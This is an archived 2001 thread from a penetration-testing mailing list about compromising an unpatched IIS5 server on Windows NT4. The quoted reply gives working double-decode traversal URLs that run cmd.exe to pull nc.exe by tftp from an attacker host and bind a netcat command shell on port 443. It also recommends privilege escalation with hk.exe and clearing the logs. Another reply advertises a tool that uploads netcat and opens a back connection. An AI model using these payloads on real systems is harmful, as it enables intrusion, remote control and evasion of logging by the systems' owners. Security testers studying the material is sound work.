Penetration Testing mailing list archives
RE: pen testing IIS5
From: "Kevin Timm" <ktimm () stingrey com>
Date: Mon, 25 Jun 2001 21:28:05 -0500
I have a utility to do this at http://invaultech.com The utility is called fire runner and it will check several unicode things , upload nc froma desirec location and creat a back connection to you. It is built on top of unicoder which has the ability to use ssl and proxy servers, K -----Original Message----- From: exceed mekka-symposium [mailto:exceed_ms () hotmail com] Sent: Sunday, June 24, 2001 2:46 PM To: pen-test () securityfocus com Subject: Re: pen testing IIS5
I am pen-testing IIS 5 [no hotfixes] running in WinNT 4.0 with no fixes. At this point I want to upload a file to the box [nc.exe] and then I will definately have the box. How can I go about doing this?
Did you tried cgi-decode? This will upload nc.exe in target's %SYSTEMROOT%\system32 directory: http://IIS_IP/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/ c+tftp.exe+-i+your_IP+GET+nc.exe+c:\winnt\system32\nc.exe This will bind nc.exe on port 443: http://IIS_IP/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/ c+nc.exe+-L+-p+443+-d+-e+cmd.exe [notice: links may be broken] Telnet IIS_IP 443 Voila. :) Elevate privileges using hk.exe... Hope this will work. ./exceed PS: don't forget to clear the logs :) _________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.
Current thread:
- Re: pen testing IIS5 exceed mekka-symposium (Jun 24)
- RE: pen testing IIS5 Kevin Timm (Jun 26)